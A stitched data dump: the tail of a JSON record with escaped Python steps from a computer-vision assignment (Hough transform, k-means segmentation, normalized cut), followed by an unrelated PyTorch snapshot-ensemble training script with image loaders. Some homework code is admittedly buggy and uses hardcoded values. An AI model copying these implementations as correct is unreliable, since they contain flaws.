print('-------------------------------------------------')\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_b():\n print('Task 3 (b) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n cv.imshow('Color Image', imgFloat)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n imgVec = np.reshape(imgFloat.copy(), (-1, 3))\n index, centers = myKmeans(imgVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape\n (imgFloat.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n 
print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_4_a():\n print('Task 4 (a) ...')\n print('-------------------------------------------------')\n D = np.zeros((8, 8))\n W = np.array(([0, 1, 0.2, 1, 0, 0, 0, 0], [1, 0, 0.1, 0, 1, 0, 0, 0], [\n 0.2, 0.1, 0, 1, 0, 1, 0.3, 0], [1, 0, 1, 0, 0, 1, 0, 0], [0, 1, 0, \n 0, 0, 0, 1, 1], [0, 0, 1, 1, 0, 0, 1, 0], [0, 0, 0.3, 0, 1, 1, 0, 1\n ], [0, 0, 0, 0, 1, 0, 1, 0]))\n for i in range(W.shape[0]):\n D[i, i] = np.sum(W[i, :])\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n invSqrtD = np.linalg.inv(np.sqrt(D))\n L = D - W\n op = np.matmul(np.matmul(invSqrtD, L), invSqrtD)\n _, _, eigenVecs = cv.eigen(op)\n secMinEigenVec = eigenVecs[eigenVecs.shape[1] - 2, :]\n C1 = 0\n C2 = 0\n for i in range(secMinEigenVec.shape[0]):\n if secMinEigenVec[i] < 0:\n C1 += D[i, i]\n else:\n C2 += D[i, i]\n print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))\n minNormCut = (1 / C1 + 1 / C2) * 2.4\n print('Min Norm Cut = ' + str(minNormCut))\n print('=================================================')\n\n\ntask_4_a()\n",
"step-5": "import numpy as np\nimport cv2 as cv\nimport random\nimport time\n\nrandom.seed(0)\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n##############################################\n# Task 1 ##########################\n##############################################\n\n\ndef task_1_a():\n print(\"Task 1 (a) ...\")\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n edges = cv.Canny( gray_image,50,150)\n #cv.imshow('edges', edges)\n detected_lines = cv.HoughLines(edges,1,np.pi/180,10)\n #print (detected_lines)\n for rho,theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n\n cv.line(img,(x1,y1),(x2,y2),(0,255,0),1)\n displayImage('1_a Hough transform - detected lines ', img)\n \n\n\n\ndef myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):\n \"\"\"\n Your implementation of HoughLines\n :param img_edges: single-channel binary source image (e.g: edges)\n :param d_resolution: the resolution for the distance parameter\n :param theta_step_sz: the resolution for the angle parameter\n :param threshold: minimum number of votes to consider a detection\n :return: list of detected lines as (d, theta) pairs and the accumulator\n \"\"\"\n accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(img_edges.shape) / d_resolution)))\n detected_lines = []\n rho = int(np.linalg.norm(img_edges.shape) / d_resolution)\n #print (rho)\n theta = int(180 / theta_step_sz)\n theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))\n #print (theta)\n width, height = img_edges.shape\n img_edges_copy = img_edges.copy()\n detected_lines = []\n for x in range(width):\n for y in range(height):\n if img_edges_copy[x,y]:\n for index_theta in range(len(theta_array)):\n #theta_value = theta * index_theta \n rho_value = x*np.cos(theta_array[index_theta]) + y*np.sin(theta_array[index_theta])\n # to avoid negative index\n index_rho = int (rho_value + rho/2) \n # to avoid index overflow\n if (index_rho >= rho) : continue\n #print('rhoindex')\n #print (index_rho)\n accumulator[index_theta, index_rho] += 1\n if accumulator[index_theta, index_rho] >= threshold:\n detected_lines.append((theta_array[index_theta], rho_value))\n \n return detected_lines, accumulator\n\n\ndef task_1_b():\n print(\"Task 1 (b) ...\")\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale\n edges = cv.Canny( img_gray,50,150) # detect the edges\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow(\"1_b Accumulator myHoughLines\", accumulator)\n #print (len(detected_lines))\n\n for theta,rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n\n cv.line(img,(x1,y1),(x2,y2),(0,0,255),2)\n displayImage('1_b Hough transform - own implementation', img)\n \n\n\n##############################################\n# Task 2 ##########################\n##############################################\n\n\ndef task_2():\n print(\"Task 2 ...\")\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale\n edges = 
cv.Canny( img_gray,50,150,apertureSize = 3) # detect the edges\n theta_res = 1 # set the resolution of theta\n d_res = 1 # set the distance resolution\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage(\"task_2_ accumulator - mean shift\", accumulator)\n #mean_shift(accumulator)\n\n\n##############################################\n# Task 3 ##########################\n##############################################\n\ndef myKmeans(data, k, useDist = False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype = int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n\n # initialize centers using some random points from data\n # ....\n\n # Randomly initialize centers with pixel difference of greater than 0\n\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n\n # Randomly initialize centers of different pixl values. Still buggy\n # start_time = time.time()\n # indices = np.arange(0,data.shape[0]).tolist()\n # for idx in range(centers.shape[0]):\n # if len(indices) > 0:\n # randIdx = random.choice(indices)\n # delIndices = np.unique(np.where((data*255).astype('uint8') == (data[randIdx]*255).astype('uint8'))).tolist()\n # if len(delIndices) > 0:\n # for i in range(len(delIndices)):\n # try:\n # indices.remove(delIndices[i])\n # except ValueError:\n # print('Value not found')\n # # print('Indices removed')\n # else:\n # randIdx = random.choice(range(data.shape[0]))\n # centers[idx] = randIdx \n # end_time = time.time()\n # print('Center no' + str(idx+1) + ' added in ' + str(round(end_time - start_time,5)) + ' seconds')\n\n # To debug uncomment the following lines\n # Sometimes the pixel values of two cluster centroids are too close\n # Therefore, one of the clusters might end up not having any points at all\n # print('Initial centers:\\n' + str(centers))\n # print('-------------------------------------------------')\n # centerVals = data[centers]\n # print('Pixel Values of initial centers:\\n' + str(centerVals))\n # print('-------------------------------------------------')\n\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n # assign each point to the cluster of closest center\n # ...\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist: \n # Since data is a vector, distance is only the difference\n # Normalize the distance to keep it between 0 and 1\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n \n # update clusters' centers and check for convergence\n # ...\n convCounter = 0\n for idx in range(centers.shape[0]):\n if (len(clusters[idx]) > 0):\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis = 0)\n diff = (np.abs(centerVals[idx] - meanVal)*255).astype('uint8')\n if (np.sum(diff) > threshold):\n # indices = np.unique(np.where((data*255).astype('uint8') == (meanVal*255).astype('uint8'))[0])\n indices = np.unique(np.where((data*255).astype('uint8') == (meanVal*255).astype('uint8'))[0])\n if 
indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n # if no pixel with the mean value is found, choose another pixel in the cluster\n # and continue\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n\n if convCounter == k:\n convergence = True\n \n iterationNo += 1\n print('iterationNo = ', iterationNo)\n \n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time - start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n\n return index, centers\n\n\ndef task_3_a():\n print(\"Task 3 (a) ...\")\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n '''\n ...\n your code ...\n ...\n '''\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n \n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n\n grayVec = np.reshape(grayImg.copy(), (-1,1))\n\n index, centers = myKmeans(grayVec, k)\n\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.reshape(grayImg.shape))\n\n cv.waitKey(0)\n print('=================================================')\n\ndef task_3_b():\n print(\"Task 3 (b) ...\")\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n '''\n ...\n your code ...\n ...\n '''\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n\n cv.imshow('Color Image', imgFloat)\n\n K = [2, 4, 6]\n\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n\n imgVec = np.reshape(imgFloat.copy(), (-1,3))\n\n index, centers = myKmeans(imgVec, k)\n\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape(imgFloat.shape))\n \n cv.waitKey(0)\n print('=================================================')\n\ndef task_3_c():\n print(\"Task 3 (c) ...\")\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n '''\n ...\n your code ...\n ...\n '''\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n \n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1,1))\n\n index, centers = myKmeans(grayVec, k, useDist = True)\n\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' + str(k), grayVec.reshape(grayImg.shape))\n \n cv.waitKey(0)\n\n print('=================================================')\n\n\n##############################################\n# Task 4 ##########################\n##############################################\n\n\ndef task_4_a():\n print(\"Task 4 (a) ...\")\n print('-------------------------------------------------')\n D = np.zeros((8,8)) \n W = np.array((\n [0, 1, 0.2, 1, 0, 0, 0, 0], # A\n [1, 0, 0.1, 0, 1, 0, 0, 0], # B\n [0.2, 0.1, 0, 1, 0, 1, 0.3, 0], # C\n [1, 0, 1, 0, 0, 1, 0, 0], # D\n [0, 1, 0, 0, 0, 0, 1, 1], # E\n [0, 0, 1, 1, 0, 
0, 1, 0], # F\n [0, 0, 0.3, 0, 1, 1, 0, 1], # G\n [0, 0, 0, 0, 1, 0, 1, 0] # H\n )) # construct the W matrix\n\n for i in range(W.shape[0]):\n D[i,i] = np.sum(W[i,:]) # construct the D matrix\n\n '''\n ...\n your code ...\n ...\n '''\n invSqrtD = np.linalg.inv(np.sqrt(D))\n L = D - W\n\n op = np.matmul(np.matmul(invSqrtD,L),invSqrtD)\n _, _, eigenVecs = cv.eigen(op)\n secMinEigenVec = eigenVecs[eigenVecs.shape[1]-2, :]\n\n C1 = 0\n C2 = 0\n for i in range(secMinEigenVec.shape[0]):\n if secMinEigenVec[i] < 0:\n C1 += D[i,i]\n else:\n C2 += D[i,i]\n\n print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))\n\n # Figure in pdf\n minNormCut = (1/C1 + 1/C2) * 2.4\n print('Min Norm Cut = ' + str(minNormCut))\n print('=================================================')\n\n##############################################\n##############################################\n##############################################\n\n\n# task_1_a()\n# task_1_b()\n# task_2()\n# task_3_a()\n# cv.destroyAllWindows()\n# task_3_b()\n# cv.destroyAllWindows()\n# task_3_c()\n# cv.destroyAllWindows()\ntask_4_a()",
"step-ids": [
7,
8,
10,
12,
13
]
}
|
[
7,
8,
10,
12,
13
] |
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
#import matplotlib.pyplot as plt
import time
import os
import copy
import torch.nn.functional as F
from PIL import Image, ExifTags
def train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes, device, num_cycles, num_epochs_per_cycle):
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
best_loss = 1000000.0
model_w_arr = []
prob = torch.zeros((dataset_sizes['val'], 3), dtype = torch.float32).to(device)
lbl = torch.zeros((dataset_sizes['val'],), dtype = torch.long).to(device)
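    # Snapshot ensembling: each cycle restarts SGD with a cosine-annealed learning rate,
    # and the weights reached at the end of every cycle are kept as one ensemble member.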
for cycle in range(num_cycles):
optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)#, weight_decay = 0.0005)
scheduler = lr_scheduler.CosineAnnealingLR(optimizer, num_epochs_per_cycle*len(dataloaders['train']))
for epoch in range(num_epochs_per_cycle):
#print('Cycle {}: Epoch {}/{}'.format(cycle, epoch, num_epochs_per_cycle - 1))
#print('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train', 'val']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
idx = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
if (epoch == num_epochs_per_cycle-1) and (phase == 'val'):
prob[idx:idx+inputs.shape[0]] += F.softmax(outputs, dim = 1)
lbl[idx:idx+inputs.shape[0]] = labels
idx += inputs.shape[0]
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
scheduler.step()
#print(optimizer.param_groups[0]['lr'])
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
#print('{} Loss: {:.4f} Acc: {:.4f}'.format(
# phase, epoch_loss, epoch_acc))
# deep copy the model
if phase == 'val' and epoch_loss < best_loss:
best_loss = epoch_loss
best_model_wts = copy.deepcopy(model.state_dict())
#print()
model_w_arr.append(copy.deepcopy(model.state_dict()))
prob /= num_cycles
ensemble_loss = F.nll_loss(torch.log(prob), lbl)
ensemble_loss = ensemble_loss.item()
time_elapsed = time.time() - since
#print('Training complete in {:.0f}m {:.0f}s'.format(
# time_elapsed // 60, time_elapsed % 60))
#print('Ensemble Loss : {:4f}, Best val Loss: {:4f}'.format(ensemble_loss, best_loss))
    # rebuild one model per saved snapshot
    model_arr = []
    for weights in model_w_arr:
        model.load_state_dict(weights)
        # append an independent copy: appending `model` itself would leave every
        # ensemble member pointing at the same module with only the last snapshot's weights
        model_arr.append(copy.deepcopy(model))
return model_arr, ensemble_loss, best_loss, prob
def test(models_arr, loader, device):
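    # Average the softmax predictions of every snapshot model over the test loader;
    # the result buffer is sized for this dataset (610 test images, 3 classes).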
res = np.zeros((610, 3), dtype = np.float32)
for model in models_arr:
model.eval()
res_arr = []
for inputs, _ in loader:
inputs = inputs.to(device)
# forward
# track history if only in train
with torch.set_grad_enabled(False):
outputs = F.softmax(model(inputs), dim = 1)
res_arr.append(outputs.detach().cpu().numpy())
res_arr = np.concatenate(res_arr, axis = 0)
res += res_arr
return res / len(models_arr)
def read_train_data(p):
imgs = []
labels = []
for i, lbl in enumerate(os.listdir(p)):
for fname in os.listdir(os.path.join(p, lbl)):
#read image
img = Image.open(os.path.join(p, lbl, fname))
#rotate image to original view
try:
exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)
if exif['Orientation'] == 3:
img=img.rotate(180, expand=True)
elif exif['Orientation'] == 6:
img=img.rotate(270, expand=True)
elif exif['Orientation'] == 8:
img=img.rotate(90, expand=True)
except:
pass
#resize all images to the same size
img = np.array(img.convert('RGB').resize((512,512), Image.ANTIALIAS))
imgs.append(img)
labels.append(i)
return imgs, labels
def read_test_data(p):
imgs = []
labels = []
ids = []
for fname in os.listdir(p):
#read image
img = Image.open(os.path.join(p, fname))
#rotate image to original view
try:
if not('DMWVNR' in fname):
exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)
if exif['Orientation'] == 3:
img=img.rotate(180, expand=True)
elif exif['Orientation'] == 6:
img=img.rotate(270, expand=True)
elif exif['Orientation'] == 8:
img=img.rotate(90, expand=True)
except:
pass
#resize all images to the same size
img = img.convert('RGB').resize((512,512), Image.ANTIALIAS)
imgs.append(np.array(img.copy()))
labels.append(0)
ids.append(fname.split('.')[0])
img.close()
return imgs, labels, ids
|
normal
|
{
"blob_id": "d807a363c08d117c848ffdc0a768c696ea7746bd",
"index": 1787,
"step-1": "<mask token>\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\n<mask token>\n\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in os.listdir(p):\n img = Image.open(os.path.join(p, fname))\n try:\n if not 'DMWVNR' in fname:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = img.convert('RGB').resize((512, 512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-3": "<mask token>\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\ndef read_train_data(p):\n imgs = []\n labels = []\n for i, lbl in enumerate(os.listdir(p)):\n for fname in os.listdir(os.path.join(p, lbl)):\n img = Image.open(os.path.join(p, lbl, fname))\n try:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = np.array(img.convert('RGB').resize((512, 512), Image.\n ANTIALIAS))\n imgs.append(img)\n labels.append(i)\n return imgs, labels\n\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in os.listdir(p):\n img = 